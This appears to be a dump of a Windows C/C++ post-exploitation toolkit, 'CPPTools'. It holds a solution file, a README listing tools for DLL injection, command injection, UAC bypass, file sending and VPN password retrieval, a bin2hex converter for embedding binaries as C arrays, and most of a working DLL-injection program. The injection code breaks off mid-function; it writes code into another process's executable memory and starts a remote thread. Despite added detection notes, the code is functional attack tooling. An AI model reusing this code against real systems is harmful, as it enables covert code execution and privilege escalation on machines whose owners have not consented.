├── CPPTools.sln ├── README.md ├── bin2hex ├── bin2hex.cpp ├── bin2hex.vcxproj └── bin2hex.vcxproj.filters ├── injectdll ├── injectdll.cpp ├── injectdll.vcxproj ├── injectdll.vcxproj.filters ├── injectlib.cpp └── injectlib.h ├── injectrun ├── injectlib.cpp ├── injectlib.h ├── injectrun.cpp ├── injectrun.vcxproj └── injectrun.vcxproj.filters ├── lcx ├── lcx.c ├── lcx.vcxproj └── lcx.vcxproj.filters ├── memoryload ├── memoryload.cpp ├── memoryload.vcxproj ├── memoryload.vcxproj.filters ├── testexe.h └── testexe64.h ├── recvfile ├── recvfile.c ├── recvfile.vcxproj └── recvfile.vcxproj.filters ├── regsvr32 ├── en-US.rc ├── regsvr32.c ├── regsvr32.rc ├── regsvr32.vcxproj ├── regsvr32.vcxproj.filters └── resource.h ├── removejunk.bat ├── rundll32 ├── lang │ ├── bg-BG.rc │ ├── cs-CZ.rc │ ├── de-DE.rc │ ├── el-GR.rc │ ├── en-US.rc │ ├── es-ES.rc │ ├── fr-FR.rc │ ├── hu-HU.rc │ ├── id-ID.rc │ ├── it-IT.rc │ ├── ja-JP.rc │ ├── lt-LT.rc │ ├── nl-NL.rc │ ├── no-NO.rc │ ├── pl-PL.rc │ ├── pt-BR.rc │ ├── ro-RO.rc │ ├── ru-RU.rc │ ├── sk-SK.rc │ ├── th-TH.rc │ └── uk-UA.rc ├── resource.h ├── rsrc.rc ├── rundll32.c ├── rundll32.rc ├── rundll32.vcxproj └── rundll32.vcxproj.filters ├── sendfile ├── sendfile.c ├── sendfile.vcxproj └── sendfile.vcxproj.filters ├── testdll ├── dllmain.cpp ├── testdll.vcxproj └── testdll.vcxproj.filters ├── testexe ├── testexe.cpp ├── testexe.vcxproj └── testexe.vcxproj.filters ├── uacbypass ├── appinfo.cpp ├── appinfo.h ├── uacbypass.cpp ├── uacbypass.vcxproj └── uacbypass.vcxproj.filters ├── uachijack ├── uachijack.cpp ├── uachijack.vcxproj └── uachijack.vcxproj.filters └── vpnpass ├── vpnpass.cpp ├── vpnpass.vcxproj └── vpnpass.vcxproj.filters /CPPTools.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | 
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bin2hex", "bin2hex\bin2hex.vcxproj", "{4B698118-664E-4F37-BDD3-A09F0EE59C00}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vpnpass", "vpnpass\vpnpass.vcxproj", "{F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "uacbypass", "uacbypass\uacbypass.vcxproj", "{FFA55554-6918-4DDF-8D6B-81952FC2E9D3}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "uachijack", "uachijack\uachijack.vcxproj", "{F5593633-8560-4316-BBF2-8CC8D6080843}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lcx", "lcx\lcx.vcxproj", "{A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}" 15 | EndProject 16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rundll32", "rundll32\rundll32.vcxproj", "{4005499D-84AD-4A74-9EF3-FB137EB54633}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "regsvr32", "regsvr32\regsvr32.vcxproj", "{DEF8432B-7CB9-4973-9B7C-D3500F0735E6}" 19 | EndProject 20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "recvfile", "recvfile\recvfile.vcxproj", "{0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}" 21 | EndProject 22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sendfile", "sendfile\sendfile.vcxproj", "{715D2472-A330-4821-BD4C-3A0844D3A547}" 23 | EndProject 24 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "injectdll", "injectdll\injectdll.vcxproj", "{852EFC89-5C41-4851-B69E-0ACE53DEA651}" 25 | EndProject 26 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testdll", "testdll\testdll.vcxproj", "{FC19169C-E033-4490-8EFB-E3E01BD3DFB8}" 27 | EndProject 28 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "injectrun", "injectrun\injectrun.vcxproj", "{4E98049A-D21B-477E-A801-EE13B47EFCA6}" 29 | EndProject 30 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "memoryload", "memoryload\memoryload.vcxproj", "{0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}" 31 | 
EndProject 32 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testexe", "testexe\testexe.vcxproj", "{5410031F-4456-4538-8B90-D2D21C75CE97}" 33 | EndProject 34 | Global 35 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 36 | Debug|x64 = Debug|x64 37 | Debug|x86 = Debug|x86 38 | Release|x64 = Release|x64 39 | Release|x86 = Release|x86 40 | EndGlobalSection 41 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 42 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x64.ActiveCfg = Debug|x64 43 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x64.Build.0 = Debug|x64 44 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x86.ActiveCfg = Debug|Win32 45 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x86.Build.0 = Debug|Win32 46 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x64.ActiveCfg = Release|x64 47 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x64.Build.0 = Release|x64 48 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x86.ActiveCfg = Release|Win32 49 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x86.Build.0 = Release|Win32 50 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x64.ActiveCfg = Debug|x64 51 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x64.Build.0 = Debug|x64 52 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x86.ActiveCfg = Debug|Win32 53 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x86.Build.0 = Debug|Win32 54 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x64.ActiveCfg = Release|x64 55 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x64.Build.0 = Release|x64 56 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x86.ActiveCfg = Release|Win32 57 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x86.Build.0 = Release|Win32 58 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x64.ActiveCfg = Debug|x64 59 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x64.Build.0 = Debug|x64 60 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x86.ActiveCfg = Debug|Win32 61 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x86.Build.0 = Debug|Win32 62 | 
{FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x64.ActiveCfg = Release|x64 63 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x64.Build.0 = Release|x64 64 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x86.ActiveCfg = Release|Win32 65 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x86.Build.0 = Release|Win32 66 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x64.ActiveCfg = Debug|x64 67 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x64.Build.0 = Debug|x64 68 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x86.ActiveCfg = Debug|Win32 69 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x86.Build.0 = Debug|Win32 70 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x64.ActiveCfg = Release|x64 71 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x64.Build.0 = Release|x64 72 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x86.ActiveCfg = Release|Win32 73 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x86.Build.0 = Release|Win32 74 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x64.ActiveCfg = Debug|x64 75 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x64.Build.0 = Debug|x64 76 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x86.ActiveCfg = Debug|Win32 77 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x86.Build.0 = Debug|Win32 78 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x64.ActiveCfg = Release|x64 79 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x64.Build.0 = Release|x64 80 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x86.ActiveCfg = Release|Win32 81 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x86.Build.0 = Release|Win32 82 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x64.ActiveCfg = Debug|x64 83 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x64.Build.0 = Debug|x64 84 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x86.ActiveCfg = Debug|Win32 85 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x86.Build.0 = Debug|Win32 86 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x64.ActiveCfg = Release|x64 87 | 
{4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x64.Build.0 = Release|x64 88 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x86.ActiveCfg = Release|Win32 89 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x86.Build.0 = Release|Win32 90 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x64.ActiveCfg = Debug|x64 91 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x64.Build.0 = Debug|x64 92 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x86.ActiveCfg = Debug|Win32 93 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x86.Build.0 = Debug|Win32 94 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x64.ActiveCfg = Release|x64 95 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x64.Build.0 = Release|x64 96 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x86.ActiveCfg = Release|Win32 97 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x86.Build.0 = Release|Win32 98 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x64.ActiveCfg = Debug|x64 99 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x64.Build.0 = Debug|x64 100 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x86.ActiveCfg = Debug|Win32 101 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x86.Build.0 = Debug|Win32 102 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x64.ActiveCfg = Release|x64 103 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x64.Build.0 = Release|x64 104 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x86.ActiveCfg = Release|Win32 105 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x86.Build.0 = Release|Win32 106 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x64.ActiveCfg = Debug|x64 107 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x64.Build.0 = Debug|x64 108 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x86.ActiveCfg = Debug|Win32 109 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x86.Build.0 = Debug|Win32 110 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x64.ActiveCfg = Release|x64 111 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x64.Build.0 = Release|x64 112 | 
{715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x86.ActiveCfg = Release|Win32 113 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x86.Build.0 = Release|Win32 114 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x64.ActiveCfg = Debug|x64 115 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x64.Build.0 = Debug|x64 116 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x86.ActiveCfg = Debug|Win32 117 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x86.Build.0 = Debug|Win32 118 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x64.ActiveCfg = Release|x64 119 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x64.Build.0 = Release|x64 120 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x86.ActiveCfg = Release|Win32 121 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x86.Build.0 = Release|Win32 122 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x64.ActiveCfg = Debug|x64 123 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x64.Build.0 = Debug|x64 124 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x86.ActiveCfg = Debug|Win32 125 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x86.Build.0 = Debug|Win32 126 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x64.ActiveCfg = Release|x64 127 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x64.Build.0 = Release|x64 128 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x86.ActiveCfg = Release|Win32 129 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x86.Build.0 = Release|Win32 130 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x64.ActiveCfg = Debug|x64 131 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x64.Build.0 = Debug|x64 132 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x86.ActiveCfg = Debug|Win32 133 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x86.Build.0 = Debug|Win32 134 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x64.ActiveCfg = Release|x64 135 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x64.Build.0 = Release|x64 136 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x86.ActiveCfg = Release|Win32 137 | 
{4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x86.Build.0 = Release|Win32 138 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x64.ActiveCfg = Debug|x64 139 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x64.Build.0 = Debug|x64 140 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x86.ActiveCfg = Debug|Win32 141 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x86.Build.0 = Debug|Win32 142 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x64.ActiveCfg = Release|x64 143 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x64.Build.0 = Release|x64 144 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x86.ActiveCfg = Release|Win32 145 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x86.Build.0 = Release|Win32 146 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x64.ActiveCfg = Debug|x64 147 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x64.Build.0 = Debug|x64 148 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x86.ActiveCfg = Debug|Win32 149 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x86.Build.0 = Debug|Win32 150 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x64.ActiveCfg = Release|x64 151 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x64.Build.0 = Release|x64 152 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x86.ActiveCfg = Release|Win32 153 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x86.Build.0 = Release|Win32 154 | EndGlobalSection 155 | GlobalSection(SolutionProperties) = preSolution 156 | HideSolutionNode = FALSE 157 | EndGlobalSection 158 | EndGlobal 159 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CPPTools 2 | 3 | ### bin2hex 4 | bin2hex.exe infile outfile [name [-ClearMZ]] 5 | 6 | ### injectdll 7 | injectdll.exe pid dll_full_path [func] 8 | 9 | ### injectrun 10 | injectrun.exe pid cmdline 11 | 12 | ### memoryload(demo) 13 | memoryload.exe cmdline 14 | 15 | ### recvfile&sendfile 16 | recvfile.exe listenport 17 | 
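sendfile.exe ip:port filepath 18 | 19 | ### uacbypass 20 | uacbypass.exe -list //get app item list 21 | uacbypass.exe -exp index //use app index to elevate 22 | 23 | ### vpnpass 24 | vpnpass.exe user //run as administrator 25 | -------------------------------------------------------------------------------- /bin2hex/bin2hex.cpp: --------------------------------------------------------------------------------
// bin2hex.cpp : Defines the entry point for the console application.
//
// Reads a binary file and writes it out as a C array definition
// (`unsigned char <name>[] = { 0x.., ... };`), 16 bytes per row.
//
// NOTE(review): the three system header names were lost when this listing
// was extracted; the ones below are inferred from the APIs the file calls.
#include <stdio.h>
#include <string.h>
#include <windows.h>


// Overwrites the two-byte DOS signature ("MZ") at offset 0 of an existing
// file with zero bytes, in place. Returns TRUE only when the file could be
// opened, really started with "MZ", and both bytes were written.
//
// The write is destructive: the input is modified on disk and no backup is
// taken. Afterwards the file can no longer be recognised as a PE image by its
// magic alone, so tooling that inspects such blobs should not key on "MZ" only.
//
// NOTE(review): main() passes a `char*` here, which only compiles when TCHAR
// is `char` (a MultiByte build).
BOOL ClearMZ(const TCHAR* lpszFilename)
{
    BOOL bRet = FALSE;
    CHAR szDosHeader[] = { 0x00, 0x00 };
    CHAR szMagic[2] = { 0, 0 };
    DWORD dwRead = 0;
    DWORD dwWritten = 0;
    HANDLE hFile = CreateFile(lpszFilename, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return FALSE;

    // Refuse to clobber the first bytes of a file that is not an MZ image.
    if (ReadFile(hFile, szMagic, sizeof(szMagic), &dwRead, NULL)
        && dwRead == sizeof(szMagic)
        && szMagic[0] == 'M' && szMagic[1] == 'Z'
        && SetFilePointer(hFile, 0, NULL, FILE_BEGIN) != INVALID_SET_FILE_POINTER)
    {
        // A short write counts as failure, not success.
        bRet = WriteFile(hFile, szDosHeader, sizeof(szDosHeader), &dwWritten, NULL)
            && dwWritten == sizeof(szDosHeader);
    }
    CloseHandle(hFile);
    return bRet;
}

// Returns TRUE when `name` is a plain C identifier: a letter or underscore
// followed by letters, digits or underscores.
static BOOL IsValidIdentifier(const char* name)
{
    const char* p;
    if (name == NULL || *name == '\0')
        return FALSE;
    for (p = name; *p != '\0'; ++p)
    {
        char ch = *p;
        BOOL isAlpha = (ch >= 'a' && ch <= 'z') || (ch >= 'A' && ch <= 'Z') || ch == '_';
        BOOL isDigit = (ch >= '0' && ch <= '9');
        if (!isAlpha && !(isDigit && p != name))
            return FALSE;
    }
    return TRUE;
}

// Usage: bin2hex.exe infile outfile [name [-ClearMZ]]
//
// argv[1]  binary input file
// argv[2]  text output file (overwritten)
// argv[3]  optional array name, default "data"
// argv[4]  optional "-ClearMZ": zero the input's MZ signature before reading
//
// Returns 0 on success and 1 on any failure. (The original returned 1 on
// success and 0 on failure, which scripts and build steps read as the
// opposite outcome.)
int main( int argc, char* argv[] )
{
    FILE* fin = NULL;
    FILE* fout = NULL;
    const char* nameVar = "data";
    int c = 0;
    int col = 0;        // position within the current row of 16 values
    BOOL first = TRUE;  // no separator before the first value
    int rc = 0;

    if (argc < 3)
    {
        printf("bin2hex.exe infile outfile [name [-ClearMZ]]\n");
        return 1;
    }

    if (argc > 3)
        nameVar = argv[3];

    // The name is pasted verbatim into generated source that someone will
    // compile, so anything other than an identifier is rejected up front.
    if (!IsValidIdentifier(nameVar))
    {
        printf("invalid array name %s\n", nameVar);
        return 1;
    }

    // Runs only after the arguments are validated: this step rewrites the
    // input file on disk.
    if (argc > 4 && _stricmp(argv[4], "-ClearMZ") == 0)
    {
        if (!ClearMZ(argv[1]))
            printf("ClearMZ failed for %s\n", argv[1]);
    }

    fin = fopen(argv[1], "rb");
    if (fin == NULL)
    {
        printf("not open file %s", argv[1]);
        return 1;
    }

    fout = fopen(argv[2], "w");
    if (fout == NULL)
    {
        printf("not create file %s", argv[2]);
        fclose(fin);    // the original leaked the input handle on this path
        return 1;
    }

    fprintf(fout, "unsigned char %s[] =\n{", nameVar);

    while ((c = fgetc(fin)) != EOF)
    {
        if (!first)
            fprintf(fout, ", ");
        if (col == 0)
            fprintf(fout, "\n\t");
        fprintf(fout, "0x%02x", c);
        first = FALSE;
        col = (col + 1) % 16;
    }

    fprintf(fout, "\n};\n");

    // fgetc() returns EOF for read errors too, and buffered write errors may
    // only surface at fclose(); a truncated array must not be reported as success.
    if (ferror(fin) || ferror(fout))
        rc = 1;
    if (fclose(fout) != 0)
        rc = 1;
    fclose(fin);

    if (rc != 0)
        printf("conversion of %s failed\n", argv[1]);
    return rc;
}
-------------------------------------------------------------------------------- /bin2hex/bin2hex.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {4B698118-664E-4F37-BDD3-A09F0EE59C00} 23 | Win32Proj 24 | bin2hex 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /bin2hex/bin2hex.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | 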
h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /injectdll/injectdll.cpp: --------------------------------------------------------------------------------
// injectdll.cpp - console tool, usage: injectdll.exe pid dllpath [func]
//
// What the code below does, in order:
//   1. enables SeDebugPrivilege on its own process token,
//   2. opens the target pid with PROCESS_ALL_ACCESS,
//   3. copies the routine MyFunc and a FuncInfo parameter block into memory
//      it allocates in the target as PAGE_EXECUTE_READWRITE,
//   4. starts a thread in the target on the copied routine.
//
// For detection and triage: this is the remote-thread form of DLL injection
// (MITRE ATT&CK T1055.001). Each step is observable on its own: the
// full-access process open (Sysmon Event ID 10, ProcessAccess), the
// cross-process thread start (Sysmon Event ID 8, CreateRemoteThread), and a
// private read-write-execute region in the target that no image file backs.
//
// NOTE(review): the four system header names below were stripped when this
// listing was extracted (the angle-bracket text is missing).
#include
#include
#include
#include
#include "injectlib.h"

// Function-pointer shapes for the kernel32 routines the copied code calls
// through FuncInfo, plus the no-argument export it may invoke.
typedef HMODULE(WINAPI *typeLoadLibrary)(LPCSTR);
typedef BOOL(WINAPI *typeFreeLibrary)(HMODULE hLibModule);
typedef FARPROC(WINAPI *typeGetProcAddress)(HMODULE, LPCSTR);
typedef void (WINAPI *typeFunc)(void);

// Parameter block written into the target process and handed to MyFunc.
// The three pointers are resolved in THIS process by InjectDLL and then used
// inside the target; presumably this relies on kernel32 being mapped at the
// same address in both processes - confirm before drawing conclusions.
struct FuncInfo
{
    typeLoadLibrary LoadLibrary;
    typeFreeLibrary FreeLibrary;
    typeGetProcAddress GetProcAddress;
    char dll[MAX_PATH];   // path of the DLL to load (ANSI)
    char func[16];        // optional export name to call after loading
};

// Allocates `size` bytes in `process` and copies `size` bytes from the local
// buffer `address` into them. Returns the remote address, or NULL when the
// allocation or the write fails.
// The region is requested as PAGE_EXECUTE_READWRITE for code and data alike.
// When the write fails, the remote allocation is not released.
void* AllocMemory(HANDLE process, void* address, int size)
{
    void* addr = VirtualAllocEx(process, 0, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addr == NULL)
        return NULL;
    if (!WriteProcessMemory(process, addr, address, size, 0))
        return NULL;
    return addr;
}

// Thread routine whose bytes are copied into the target; it runs there, not
// in this process, so it only reaches the outside world through `info`.
// Loads info->dll, calls the export named info->func when it resolves, then
// calls FreeLibrary - including when the load failed and `dll` is NULL.
// Always returns 0, so the thread exit code carries no result.
DWORD WINAPI MyFunc(FuncInfo* info)
{
    HMODULE dll = info->LoadLibrary(info->dll);
    if (dll)
    {
        typeFunc func = (typeFunc)info->GetProcAddress(dll, info->func);
        if (func)
            func();
    }
    info->FreeLibrary(dll);
    return 0;
}

// Marker only: InjectDLL subtracts MyFunc's address from this function's
// address and uses the difference as the number of bytes to copy.
int WINAPI EndFunc()
{
    return 0;
}

// Performs steps 2-4 of the file header for the process id given as the
// decimal string `pid`. `func` may be NULL.
// Reports only through printf; `res` is assigned but never read or returned.
void InjectDLL(const char* pid, const char* pathDll, const char* func)
{
    bool res = false;
    FuncInfo info;
    // NOTE(review): both copies are unbounded. `dll` holds MAX_PATH bytes and
    // `func` 16, and both strings come straight from the command line.
    // `info` is not zeroed, so `func` keeps stack garbage when func is NULL.
    strcpy(info.dll, pathDll);
    if(func)
        strcpy(info.func, func);

    HMODULE kernel = GetModuleHandleA("kernel32.dll");
    info.LoadLibrary = (typeLoadLibrary)GetProcAddress(kernel, "LoadLibraryA");
    info.GetProcAddress = (typeGetProcAddress)GetProcAddress(kernel, "GetProcAddress");
    info.FreeLibrary = (typeFreeLibrary)GetProcAddress(kernel, "FreeLibrary");

    // Requests every access right on the target; the handle is never closed.
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(pid));
    if (process)
    {
        // Neither AllocMemory result is checked before the thread is created.
        void* ptr_func = AllocMemory(process, &MyFunc, int(EndFunc) - int(MyFunc));
        void* ptr_info = AllocMemory(process, &info, sizeof(info));
        HANDLE thread = _CreateRemoteThread(process, 0, 0, (LPTHREAD_START_ROUTINE)ptr_func, ptr_info, 0, 0);
        if (thread == 0)
            printf("CreateRemoteThread failed (err = %d)\n", GetLastError());
        else
        {
            // The message below only means a thread was created; the code
            // never waits for it or checks whether the DLL actually loaded.
            CloseHandle(thread);
            printf("dll injected in process[%s]\n", pid);
            res = true;
        }
    }
    else
        printf("OpenProcess failed, err = %d", GetLastError());
}

// Enables (bEnable TRUE) or disables the privilege named `pstrPrivilege` on
// the token of `hProcess`. Returns TRUE only when the adjustment took effect.
BOOL EnableProcessPrivilege(HANDLE hProcess, PCHAR pstrPrivilege, BOOL bEnable)
{
